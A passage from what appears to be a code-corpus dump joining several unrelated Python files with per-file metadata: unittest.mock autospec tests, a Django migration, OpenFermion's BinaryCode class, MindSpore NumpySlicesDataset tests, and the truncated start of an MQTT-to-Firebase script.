this_mock.a.assert_called_with(5)
self.assertRaises(TypeError, this_mock.a, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, this_mock, 'b')
instance_mock = create_autospec(Foo())
instance_mock.a(5)
instance_mock.a.assert_called_with(5)
instance_mock.a.assert_called_with(x=5)
self.assertRaises(TypeError, instance_mock.a, 'foo', 'bar')
self.assertRaises(AttributeError, getattr, instance_mock, 'b')
        # The return value isn't callable
self.assertRaises(TypeError, instance_mock)
instance_mock.Bar.f(6)
instance_mock.Bar.f.assert_called_with(6)
instance_mock.Bar.f.assert_called_with(y=6)
self.assertRaises(AttributeError, getattr, instance_mock.Bar, 'g')
instance_mock.Bar().f(6)
instance_mock.Bar().f.assert_called_with(6)
instance_mock.Bar().f.assert_called_with(y=6)
self.assertRaises(AttributeError, getattr, instance_mock.Bar(), 'g')
def test_inherit(self):
class Foo(object):
a = 3
Foo.Foo = Foo
# class
mock = create_autospec(Foo)
instance = mock()
self.assertRaises(AttributeError, getattr, instance, 'b')
attr_instance = mock.Foo()
self.assertRaises(AttributeError, getattr, attr_instance, 'b')
# instance
mock = create_autospec(Foo())
self.assertRaises(AttributeError, getattr, mock, 'b')
self.assertRaises(TypeError, mock)
# attribute instance
call_result = mock.Foo()
self.assertRaises(AttributeError, getattr, call_result, 'b')
def test_builtins(self):
# used to fail with infinite recursion
create_autospec(1)
create_autospec(int)
create_autospec('foo')
create_autospec(str)
create_autospec({})
create_autospec(dict)
create_autospec([])
create_autospec(list)
create_autospec(set())
create_autospec(set)
create_autospec(1.0)
create_autospec(float)
create_autospec(1j)
create_autospec(complex)
create_autospec(False)
create_autospec(True)
def test_function(self):
def f(a, b):
pass
mock = create_autospec(f)
self.assertRaises(TypeError, mock)
mock(1, 2)
mock.assert_called_with(1, 2)
mock.assert_called_with(1, b=2)
mock.assert_called_with(a=1, b=2)
f.f = f
mock = create_autospec(f)
self.assertRaises(TypeError, mock.f)
mock.f(3, 4)
mock.f.assert_called_with(3, 4)
mock.f.assert_called_with(a=3, b=4)
def test_skip_attributeerrors(self):
class Raiser(object):
def __get__(self, obj, type=None):
if obj is None:
raise AttributeError('Can only be accessed via an instance')
class RaiserClass(object):
raiser = Raiser()
@staticmethod
def existing(a, b):
return a + b
s = create_autospec(RaiserClass)
self.assertRaises(TypeError, lambda x: s.existing(1, 2, 3))
s.existing(1, 2)
self.assertRaises(AttributeError, lambda: s.nonexisting)
# check we can fetch the raiser attribute and it has no spec
obj = s.raiser
obj.foo, obj.bar
def test_signature_class(self):
class Foo(object):
def __init__(self, a, b=3):
pass
mock = create_autospec(Foo)
self.assertRaises(TypeError, mock)
mock(1)
mock.assert_called_once_with(1)
mock.assert_called_once_with(a=1)
self.assertRaises(AssertionError, mock.assert_called_once_with, 2)
mock(4, 5)
mock.assert_called_with(4, 5)
mock.assert_called_with(a=4, b=5)
self.assertRaises(AssertionError, mock.assert_called_with, a=5, b=4)
def test_class_with_no_init(self):
# this used to raise an exception
# due to trying to get a signature from object.__init__
class Foo(object):
pass
create_autospec(Foo)
def test_signature_callable(self):
class Callable(object):
def __init__(self, x, y):
pass
def __call__(self, a):
pass
mock = create_autospec(Callable)
mock(1, 2)
mock.assert_called_once_with(1, 2)
mock.assert_called_once_with(x=1, y=2)
self.assertRaises(TypeError, mock, 'a')
instance = mock(1, 2)
self.assertRaises(TypeError, instance)
instance(a='a')
instance.assert_called_once_with('a')
instance.assert_called_once_with(a='a')
instance('a')
instance.assert_called_with('a')
instance.assert_called_with(a='a')
mock = create_autospec(Callable(1, 2))
mock(a='a')
mock.assert_called_once_with(a='a')
self.assertRaises(TypeError, mock)
mock('a')
mock.assert_called_with('a')
def test_signature_noncallable(self):
class NonCallable(object):
def __init__(self):
pass
mock = create_autospec(NonCallable)
instance = mock()
mock.assert_called_once_with()
self.assertRaises(TypeError, mock, 'a')
self.assertRaises(TypeError, instance)
self.assertRaises(TypeError, instance, 'a')
mock = create_autospec(NonCallable())
self.assertRaises(TypeError, mock)
self.assertRaises(TypeError, mock, 'a')
def test_create_autospec_none(self):
class Foo(object):
bar = None
mock = create_autospec(Foo)
none = mock.bar
self.assertNotIsInstance(none, type(None))
none.foo()
none.foo.assert_called_once_with()
def test_autospec_functions_with_self_in_odd_place(self):
class Foo(object):
def f(a, self):
pass
a = create_autospec(Foo)
a.f(10)
a.f.assert_called_with(10)
a.f.assert_called_with(self=10)
a.f(self=10)
a.f.assert_called_with(10)
a.f.assert_called_with(self=10)
def test_autospec_data_descriptor(self):
class Descriptor(object):
def __init__(self, value):
self.value = value
def __get__(self, obj, cls=None):
if obj is None:
return self
return self.value
def __set__(self, obj, value):
pass
class MyProperty(property):
pass
class Foo(object):
__slots__ = ['slot']
@property
def prop(self):
return 3
@MyProperty
def subprop(self):
return 4
desc = Descriptor(42)
foo = create_autospec(Foo)
def check_data_descriptor(mock_attr):
# Data descriptors don't have a spec.
self.assertIsInstance(mock_attr, MagicMock)
mock_attr(1, 2, 3)
mock_attr.abc(4, 5, 6)
mock_attr.assert_called_once_with(1, 2, 3)
mock_attr.abc.assert_called_once_with(4, 5, 6)
# property
check_data_descriptor(foo.prop)
# property subclass
check_data_descriptor(foo.subprop)
# class __slot__
check_data_descriptor(foo.slot)
# plain data descriptor
check_data_descriptor(foo.desc)
def test_autospec_on_bound_builtin_function(self):
meth = types.MethodType(time.ctime, time.time())
self.assertIsInstance(meth(), str)
mocked = create_autospec(meth)
# no signature, so no spec to check against
mocked()
mocked.assert_called_once_with()
mocked.reset_mock()
mocked(4, 5, 6)
mocked.assert_called_once_with(4, 5, 6)
class TestCallList(unittest.TestCase):
def test_args_list_contains_call_list(self):
mock = Mock()
self.assertIsInstance(mock.call_args_list, _CallList)
mock(1, 2)
mock(a=3)
mock(3, 4)
mock(b=6)
for kall in call(1, 2), call(a=3), call(3, 4), call(b=6):
self.assertIn(kall, mock.call_args_list)
calls = [call(a=3), call(3, 4)]
self.assertIn(calls, mock.call_args_list)
calls = [call(1, 2), call(a=3)]
self.assertIn(calls, mock.call_args_list)
calls = [call(3, 4), call(b=6)]
self.assertIn(calls, mock.call_args_list)
calls = [call(3, 4)]
self.assertIn(calls, mock.call_args_list)
self.assertNotIn(call('fish'), mock.call_args_list)
self.assertNotIn([call('fish')], mock.call_args_list)
def test_call_list_str(self):
mock = Mock()
mock(1, 2)
mock.foo(a=3)
mock.foo.bar().baz('fish', cat='dog')
expected = (
"[call(1, 2),\n"
" call.foo(a=3),\n"
" call.foo.bar(),\n"
" call.foo.bar().baz('fish', cat='dog')]"
)
self.assertEqual(str(mock.mock_calls), expected)
def test_propertymock(self):
p = patch('%s.SomeClass.one' % __name__, new_callable=PropertyMock)
mock = p.start()
try:
SomeClass.one
mock.assert_called_once_with()
s = SomeClass()
s.one
mock.assert_called_with()
self.assertEqual(mock.mock_calls, [call(), call()])
s.one = 3
self.assertEqual(mock.mock_calls, [call(), call(), call(3)])
finally:
p.stop()
def test_propertymock_returnvalue(self):
m = MagicMock()
p = PropertyMock()
type(m).foo = p
returned = m.foo
p.assert_called_once_with()
self.assertIsInstance(returned, MagicMock)
self.assertNotIsInstance(returned, PropertyMock)
if __name__ == '__main__':
unittest.main()
| Mark_attandance_py_selenium/py/App/Python/Lib/unittest/test/testmock/testhelpers.py | 27,816 | see mock issue 128 this is expected to fail until the issue is fixed Note: no type checking on the "self" parameter because spec as a list of strings in the mock constructor means something very different we treat a list instance as the type. we could replace builtin functions / methods with a function with *args / **kwargs signature. Using the builtin method type as a spec seems to work fairly well though. The return value isn't isn't callable class instance attribute instance used to fail with infinite recursion check we can fetch the raiser attribute and it has no spec this used to raise an exception due to trying to get a signature from object.__init__ Data descriptors don't have a spec. property property subclass class __slot__ plain data descriptor no signature, so no spec to check against | 806 | en | 0.905684 |
# Generated by Django 3.2.4 on 2021-08-06 15:38
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('blog', '0002_alter_tag_tag_name'),
]
operations = [
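        # Remove the `subject` field from the Comment model.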
migrations.RemoveField(
model_name='comment',
name='subject',
),
]
| blog/migrations/0003_remove_comment_subject.py | 327 | Generated by Django 3.2.4 on 2021-08-06 15:38 | 45 | en | 0.758967 |
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" Binary code class for Fermion-qubit mappings (arXiv:1712.07067) """
import copy
import numpy
import scipy
import scipy.sparse
from openfermion.ops import BinaryPolynomial
def shift_decoder(decoder, shift_constant):
""" Shifts the indices of a decoder by a constant.
Args:
decoder (iterable): list of BinaryPolynomial; the decoder
shift_constant (int): the qubit index that corresponds to the offset.
Returns (list): list of BinaryPolynomial shifted decoder
"""
decode_shifted = []
if not isinstance(shift_constant, (numpy.int64, numpy.int32, int)):
        raise TypeError('the shift to the decoder must be an integer. got {} '
                        'of type {}'.format(shift_constant,
                                            type(shift_constant)))
for entry in decoder:
tmp_entry = copy.deepcopy(entry)
tmp_entry.shift(shift_constant)
decode_shifted.append(tmp_entry)
return decode_shifted
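# Illustration (added comment, not part of the original module): for example,
# shift_decoder([BinaryPolynomial('w0'), BinaryPolynomial('w1 w2')], 3) returns
# [w3, w4 w5], i.e. every qubit index in the decoder is raised by 3.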
def double_decoding(decoder_1, decoder_2):
""" Concatenates two decodings
Args:
decoder_1 (iterable): list of BinaryPolynomial
decoding of the outer code layer
decoder_2 (iterable): list of BinaryPolynomial
decoding of the inner code layer
Returns (list): list of BinaryPolynomial the decoding defined by
w -> decoder_1( decoder_2(w) )
"""
doubled_decoder = []
for entry in decoder_1:
tmp_sum = 0
for summand in entry.terms:
tmp_term = BinaryPolynomial('1')
for factor in summand:
if isinstance(factor, (numpy.int32, numpy.int64, int)):
tmp_term *= decoder_2[factor]
tmp_sum = tmp_term + tmp_sum
doubled_decoder += [tmp_sum]
return doubled_decoder
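# Illustration (added comment, not part of the original module): with
# decoder_1 = [BinaryPolynomial('w0 w1')] and
# decoder_2 = [BinaryPolynomial('w1'), BinaryPolynomial('w0')],
# double_decoding substitutes w0 -> w1 and w1 -> w0 inside the product,
# so the result is [w0 w1] again.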
class BinaryCodeError(Exception):
pass
class BinaryCode(object):
"""The BinaryCode class provides a representation of an encoding-decoding
pair for binary vectors of different lengths, where the decoding is allowed
to be non-linear.
    As the occupation number of a fermionic mode is effectively binary,
    a length-N vector (v) of binary numbers can be utilized to describe
a configuration of a many-body fermionic state on N modes.
An n-qubit product state configuration \|w0> \|w1> \|w2> ... \|wn-1>,
on the other hand is described by a length-n binary vector
w=(w0, w1, ..., wn-1). To map a subset of N-Orbital Fermion states
to n-qubit states we define a binary code, which consists of a
(here: linear) encoding (e) and a (non-linear) decoding (d), such
that for every v from that subset, w = e(v) is a length-n binary
vector with d(w) = v. This can be used to save qubits given a
Hamiltonian that dictates such a subset, otherwise n=N.
Two binary codes (e,d) and (e',d') can construct a third code (e",d")
by two possible operations:
Concatenation: (e",d") = (e,d) * (e',d')
which means e": v" -> e'( e(v") ) and d": w" -> d( d'(w") )
where n" = n' and N" = N, with n = N' as necessary condition.
Appendage: (e",d") = (e,d) + (e',d')
which means e": (v + v') -> e(v) + e'(v') and d": (w + w') -> d(w) + d'(
w')
where the addition is to be understood as appending two vectors together,
so N" = N' + N and n" = n + n'.
Appending codes is particularly useful when considering segment codes or
segmented transforms.
A BinaryCode-instance is initialized by BinaryCode(A,d),
given the encoding (e) as n x N array or matrix-like nested lists A,
such that e(v) = (A v) mod 2. The decoding d is an array or a list
input of length N, which has entries either of type BinaryPolynomial, or of
valid type for an input of the BinaryPolynomial-constructor.
The signs + and \*, += and \*= are overloaded to implement concatenation
and appendage on BinaryCode-objects.
    NOTE: multiplication of a BinaryCode with an integer yields a
    multiple appending of the same code; multiplication with another
    BinaryCode yields their concatenation.
Attributes:
decoder (list): list of BinaryPolynomial: Outputs the decoding
functions as components.
encoder (scipy.sparse.csc_matrix): Outputs A, the linear matrix that
implements the encoding function.
n_modes (int): Outputs the number of modes.
n_qubits (int): Outputs the number of qubits.
"""
def __init__(self, encoding, decoding):
""" Initialization of a binary code.
Args:
encoding (np.ndarray or list): nested lists or binary 2D-array
decoding (array or list): list of BinaryPolynomial (list or str).
Raises:
TypeError: non-list, array like encoding or decoding, unsuitable
BinaryPolynomial generators,
BinaryCodeError: in case of decoder/encoder size mismatch or
decoder size, qubits indexed mismatch
"""
if not isinstance(encoding, (numpy.ndarray, list)):
raise TypeError('encoding must be a list or array.')
if not isinstance(decoding, (numpy.ndarray, list)):
raise TypeError('decoding must be a list or array.')
self.encoder = scipy.sparse.csc_matrix(encoding)
self.n_qubits, self.n_modes = numpy.shape(encoding)
if self.n_modes != len(decoding):
raise BinaryCodeError(
'size mismatch, decoder and encoder should have the same'
' first dimension')
decoder_qubits = set()
self.decoder = []
for symbolic_binary in decoding:
if isinstance(symbolic_binary, (tuple, list, str, int,
numpy.int32, numpy.int64)):
symbolic_binary = BinaryPolynomial(symbolic_binary)
if isinstance(symbolic_binary, BinaryPolynomial):
self.decoder.append(symbolic_binary)
decoder_qubits = decoder_qubits | set(
symbolic_binary.enumerate_qubits())
else:
raise TypeError(
'decoder component provided '
'is not a suitable for BinaryPolynomial',
symbolic_binary)
if len(decoder_qubits) != self.n_qubits:
raise BinaryCodeError(
'decoder and encoder provided has different number of qubits')
if max(decoder_qubits) + 1 > self.n_qubits:
            raise BinaryCodeError('decoder is not indexing some qubits. Qubits'
                                  ' indexed are: {}'.format(decoder_qubits))
def __iadd__(self, appendix):
""" In-place appending a binary code with +=.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): A global binary code with size
(n_modes1 + n_modes2), (n_qubits1,n_qubits2)
Raises:
TypeError: Appendix must be a BinaryCode.
"""
if not isinstance(appendix, BinaryCode):
raise TypeError('argument must be a BinaryCode.')
self.decoder = numpy.append(self.decoder,
shift_decoder(appendix.decoder,
self.n_qubits)).tolist()
self.encoder = scipy.sparse.bmat([[self.encoder, None],
[None, appendix.encoder]])
self.n_qubits, self.n_modes = numpy.shape(self.encoder)
return self
def __add__(self, appendix):
"""Appends two binary codes via addition +.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): global binary code
"""
twin = copy.deepcopy(self)
twin += appendix
return twin
def __imul__(self, factor):
"""In-place code concatenation or appendage via *= .
Multiplication with integer will yield appendage, otherwise
concatenation.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Raises:
TypeError: factor must be an integer or a BinaryCode
BinaryCodeError: size mismatch between self and factor
ValueError: in case of an integer factor that is < 1
"""
if not isinstance(factor, (BinaryCode, numpy.int32, numpy.int64, int)):
raise TypeError('argument must be a BinaryCode or integer')
if isinstance(factor, BinaryCode):
if self.n_qubits != factor.n_modes:
raise BinaryCodeError(
'size mismatch between inner and outer code layer')
self.decoder = double_decoding(self.decoder, factor.decoder)
self.encoder = factor.encoder.dot(self.encoder)
self.n_qubits, self.n_modes = numpy.shape(self.encoder)
return self
elif isinstance(factor, (numpy.int32, numpy.int64, int)):
if factor < 1:
raise ValueError('integer factor has to be positive, '
'non-zero ')
self.encoder = scipy.sparse.kron(
scipy.sparse.identity(factor, format='csc', dtype=int),
self.encoder, 'csc')
tmp_decoder = self.decoder
for index in numpy.arange(1, factor):
self.decoder = numpy.append(self.decoder,
shift_decoder(tmp_decoder,
index *
self.n_qubits))
self.n_qubits *= factor
self.n_modes *= factor
return self
def __mul__(self, factor):
""" Concatenation of two codes or appendage the same code factor times
in case of integer factor.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
"""
twin = copy.deepcopy(self)
twin *= factor
return twin
def __rmul__(self, factor):
""" Appending the same code factor times.
Args:
factor (int): integer defining number of appendages.
Returns (BinaryCode): Segmented code.
Raises:
TypeError: factor must be an integer
"""
if isinstance(factor, (numpy.int32, numpy.int64, int)):
return self * factor
else:
            raise TypeError('the left multiplier of a BinaryCode must be an '
                            'integer. Was given {} of '
'type {}'.format(factor, type(factor)))
def __str__(self):
""" Return an easy-to-read string representation."""
string_return = [list(map(list, self.encoder.toarray()))]
dec_str = '['
for term in self.decoder:
dec_str += term.__str__() + ','
dec_str = dec_str[:-1]
string_return.append(dec_str + ']')
return str(string_return)
def __repr__(self):
return str(self)
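

# ----------------------------------------------------------------------------
# Minimal usage sketch (added for illustration; not part of the original
# module). It relies only on the definitions above and on the fact, stated in
# the BinaryCode docstring, that plain strings such as 'w0' are valid inputs
# to the BinaryPolynomial constructor.
if __name__ == '__main__':
    # A trivial 2-mode / 2-qubit code: e(v) = v and d(w) = w.
    trivial = BinaryCode([[1, 0], [0, 1]], ['w0', 'w1'])

    # Appendage (+): the two codes act on disjoint modes and qubits.
    appended = trivial + trivial
    print(appended.n_modes, appended.n_qubits)  # 4 4

    # Concatenation (*): d"(w) = d(d'(w)); the inner code's qubit count must
    # equal the outer code's mode count.
    concatenated = trivial * trivial
    print(concatenated.n_modes, concatenated.n_qubits)  # 2 2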
| src/openfermion/ops/_binary_code.py | 11,940 | The BinaryCode class provides a representation of an encoding-decoding
pair for binary vectors of different lengths, where the decoding is allowed
to be non-linear.
As the occupation number of fermionic mode is effectively binary,
a length-N vector (v) of binary number can be utilized to describe
a configuration of a many-body fermionic state on N modes.
An n-qubit product state configuration \|w0> \|w1> \|w2> ... \|wn-1>,
on the other hand is described by a length-n binary vector
w=(w0, w1, ..., wn-1). To map a subset of N-Orbital Fermion states
to n-qubit states we define a binary code, which consists of a
(here: linear) encoding (e) and a (non-linear) decoding (d), such
that for every v from that subset, w = e(v) is a length-n binary
vector with d(w) = v. This can be used to save qubits given a
Hamiltonian that dictates such a subset, otherwise n=N.
Two binary codes (e,d) and (e',d') can construct a third code (e",d")
by two possible operations:
Concatenation: (e",d") = (e,d) * (e',d')
which means e": v" -> e'( e(v") ) and d": w" -> d( d'(w") )
where n" = n' and N" = N, with n = N' as necessary condition.
Appendage: (e",d") = (e,d) + (e',d')
which means e": (v + v') -> e(v) + e'(v') and d": (w + w') -> d(w) + d'(
w')
where the addition is to be understood as appending two vectors together,
so N" = N' + N and n" = n + n'.
Appending codes is particularly useful when considering segment codes or
segmented transforms.
A BinaryCode-instance is initialized by BinaryCode(A,d),
given the encoding (e) as n x N array or matrix-like nested lists A,
such that e(v) = (A v) mod 2. The decoding d is an array or a list
input of length N, which has entries either of type BinaryPolynomial, or of
valid type for an input of the BinaryPolynomial-constructor.
The signs + and \*, += and \*= are overloaded to implement concatenation
and appendage on BinaryCode-objects.
NOTE: multiplication of a BinaryCode with an integer yields a
multiple appending of the same code, the multiplication with another
BinaryCode their concatenation.
Attributes:
decoder (list): list of BinaryPolynomial: Outputs the decoding
functions as components.
encoder (scipy.sparse.csc_matrix): Outputs A, the linear matrix that
implements the encoding function.
n_modes (int): Outputs the number of modes.
n_qubits (int): Outputs the number of qubits.
Appends two binary codes via addition +.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): global binary code
In-place appending a binary code with +=.
Args:
appendix (BinaryCode): The code to append to the present one.
Returns (BinaryCode): A global binary code with size
(n_modes1 + n_modes2), (n_qubits1,n_qubits2)
Raises:
TypeError: Appendix must be a BinaryCode.
In-place code concatenation or appendage via *= .
Multiplication with integer will yield appendage, otherwise
concatenation.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Raises:
TypeError: factor must be an integer or a BinaryCode
BinaryCodeError: size mismatch between self and factor
ValueError: in case of an integer factor that is < 1
Initialization of a binary code.
Args:
encoding (np.ndarray or list): nested lists or binary 2D-array
decoding (array or list): list of BinaryPolynomial (list or str).
Raises:
TypeError: non-list, array like encoding or decoding, unsuitable
BinaryPolynomial generators,
BinaryCodeError: in case of decoder/encoder size mismatch or
decoder size, qubits indexed mismatch
Concatenation of two codes or appendage the same code factor times
in case of integer factor.
Args:
factor (int or BinaryCode): the BinaryCode to concatenate. In case
of int, it will append the code to itself factor times.
Returns (BinaryCode): segmented or concatenated code
Appending the same code factor times.
Args:
factor (int): integer defining number of appendages.
Returns (BinaryCode): Segmented code.
Raises:
TypeError: factor must be an integer
Return an easy-to-read string representation.
Concatenates two decodings
Args:
decoder_1 (iterable): list of BinaryPolynomial
decoding of the outer code layer
decoder_2 (iterable): list of BinaryPolynomial
decoding of the inner code layer
Returns (list): list of BinaryPolynomial the decoding defined by
w -> decoder_1( decoder_2(w) )
Shifts the indices of a decoder by a constant.
Args:
decoder (iterable): list of BinaryPolynomial; the decoder
shift_constant (int): the qubit index that corresponds to the offset.
Returns (list): list of BinaryPolynomial shifted decoder
Binary code class for Fermion-qubit mappings (arXiv:1712.07067)
Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. | 5,423 | en | 0.739648 |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import sys
import pytest
import numpy as np
import pandas as pd
import mindspore.dataset as de
from mindspore import log as logger
import mindspore.dataset.transforms.vision.c_transforms as vision
def test_numpy_slices_list_1():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert data[0] == np_data[i]
def test_numpy_slices_list_2():
logger.info("Test Slicing a 2D list into 1D list.")
np_data = [[1, 2], [3, 4]]
ds = de.NumpySlicesDataset(np_data, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
def test_numpy_slices_list_3():
logger.info("Test Slicing list in the first dimension.")
np_data = [[[1, 2], [3, 4]], [[5, 6], [7, 8]]]
ds = de.NumpySlicesDataset(np_data, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
def test_numpy_slices_list_append():
logger.info("Test reading data of image list.")
DATA_DIR = ["../data/dataset/test_tf_file_3_images/train-0000-of-0001.data"]
resize_height, resize_width = 2, 2
data1 = de.TFRecordDataset(DATA_DIR)
resize_op = vision.Resize((resize_height, resize_width))
data1 = data1.map(input_columns=["image"], operations=[vision.Decode(True), resize_op])
res = []
for data in data1.create_dict_iterator():
res.append(data["image"])
ds = de.NumpySlicesDataset(res, column_names=["col1"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, res[i]).all()
def test_numpy_slices_dict_1():
logger.info("Test Dictionary structure data.")
np_data = {"a": [1, 2], "b": [3, 4]}
ds = de.NumpySlicesDataset(np_data, shuffle=False)
res = [[1, 3], [2, 4]]
for i, data in enumerate(ds):
assert data[0] == res[i][0]
assert data[1] == res[i][1]
def test_numpy_slices_tuple_1():
logger.info("Test slicing a list of tuple.")
np_data = [([1, 2], [3, 4]), ([11, 12], [13, 14]), ([21, 22], [23, 24])]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, np_data[i]).all()
assert sum([1 for _ in ds]) == 3
def test_numpy_slices_tuple_2():
logger.info("Test slicing a tuple of list.")
np_data = ([1, 2], [3, 4], [5, 6])
expected = [[1, 3, 5], [2, 4, 6]]
ds = de.NumpySlicesDataset(np_data, shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, expected[i]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_tuple_3():
logger.info("Test reading different dimension of tuple data.")
features, labels = np.random.sample((5, 2)), np.random.sample((5, 1))
data = (features, labels)
ds = de.NumpySlicesDataset(data, column_names=["col1", "col2"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data[0], features[i]).all()
assert data[1] == labels[i]
def test_numpy_slices_csv_value():
logger.info("Test loading value of csv file.")
csv_file = "../data/dataset/testNumpySlicesDataset/heart.csv"
df = pd.read_csv(csv_file)
target = df.pop("target")
df.pop("state")
np_data = (df.values, target.values)
ds = de.NumpySlicesDataset(np_data, column_names=["col1", "col2"], shuffle=False)
for i, data in enumerate(ds):
assert np.equal(np_data[0][i], data[0]).all()
assert np.equal(np_data[1][i], data[1]).all()
def test_numpy_slices_csv_dict():
logger.info("Test loading csv file as dict.")
csv_file = "../data/dataset/testNumpySlicesDataset/heart.csv"
df = pd.read_csv(csv_file)
df.pop("state")
res = df.values
ds = de.NumpySlicesDataset(dict(df), shuffle=False)
for i, data in enumerate(ds):
assert np.equal(data, res[i]).all()
def test_numpy_slices_num_samplers():
logger.info("Test num_samplers.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, shuffle=False, num_samples=2)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_distributed_sampler():
logger.info("Test distributed sampler.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, shuffle=False, shard_id=0, num_shards=4)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i * 4]).all()
assert sum([1 for _ in ds]) == 2
def test_numpy_slices_distributed_shard_limit():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
num = sys.maxsize
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, num_shards=num, shard_id=0, shuffle=False)
assert "Input num_shards is not within the required interval of (1 to 2147483647)." in str(err.value)
def test_numpy_slices_distributed_zero_shard():
logger.info("Test Slicing a 1D list.")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, num_shards=0, shard_id=0, shuffle=False)
assert "Input num_shards is not within the required interval of (1 to 2147483647)." in str(err.value)
def test_numpy_slices_sequential_sampler():
logger.info("Test numpy_slices_dataset with SequentialSampler and repeat.")
np_data = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
ds = de.NumpySlicesDataset(np_data, sampler=de.SequentialSampler()).repeat(2)
for i, data in enumerate(ds):
assert np.equal(data[0], np_data[i % 8]).all()
def test_numpy_slices_invalid_column_names_type():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(TypeError) as err:
de.NumpySlicesDataset(np_data, column_names=[1], shuffle=False)
assert "Argument column_names[0] with value 1 is not of type (<class 'str'>,)." in str(err.value)
def test_numpy_slices_invalid_column_names_string():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, column_names=[""], shuffle=False)
assert "column_names[0] should not be empty" in str(err.value)
def test_numpy_slices_invalid_empty_column_names():
logger.info("Test incorrect column_names input")
np_data = [1, 2, 3]
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, column_names=[], shuffle=False)
assert "column_names should not be empty" in str(err.value)
def test_numpy_slices_invalid_empty_data_column():
logger.info("Test incorrect column_names input")
np_data = []
with pytest.raises(ValueError) as err:
de.NumpySlicesDataset(np_data, shuffle=False)
assert "Argument data cannot be empty" in str(err.value)
if __name__ == "__main__":
test_numpy_slices_list_1()
test_numpy_slices_list_2()
test_numpy_slices_list_3()
test_numpy_slices_list_append()
test_numpy_slices_dict_1()
test_numpy_slices_tuple_1()
test_numpy_slices_tuple_2()
test_numpy_slices_tuple_3()
test_numpy_slices_csv_value()
test_numpy_slices_csv_dict()
test_numpy_slices_num_samplers()
test_numpy_slices_distributed_sampler()
test_numpy_slices_distributed_shard_limit()
test_numpy_slices_distributed_zero_shard()
test_numpy_slices_sequential_sampler()
test_numpy_slices_invalid_column_names_type()
test_numpy_slices_invalid_column_names_string()
test_numpy_slices_invalid_empty_column_names()
test_numpy_slices_invalid_empty_data_column()
| tests/ut/python/dataset/test_dataset_numpy_slices.py | 8,500 | Copyright 2020 Huawei Technologies Co., Ltd Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. ============================================================================== | 640 | en | 0.808401 |
""" Bu kod MQTT den alir FireBase e atar """
import firebase_admin
from firebase_admin import credentials
from firebase_admin import firestore
import paho.mqtt.client as mqtt
from time import sleep
import json
import sys
Fb_Coll = "color"
def main():
x = open("../ip.json")
data_ = json.load(x)
ip = data_["ip"]
x.close()
cred = credentials.Certificate("../Login.json")
firebase_admin.initialize_app(cred)
Server = ip
db = firestore.client()
def on_connect(client, userdata, flags, rc):
print("Connected with result code "+str(rc))
client.subscribe("/blue")
print("Topics Subscribed Successfully")
def on_message(client, userdata, msg):
topic = msg.topic
data = msg.payload.decode('UTF-8')
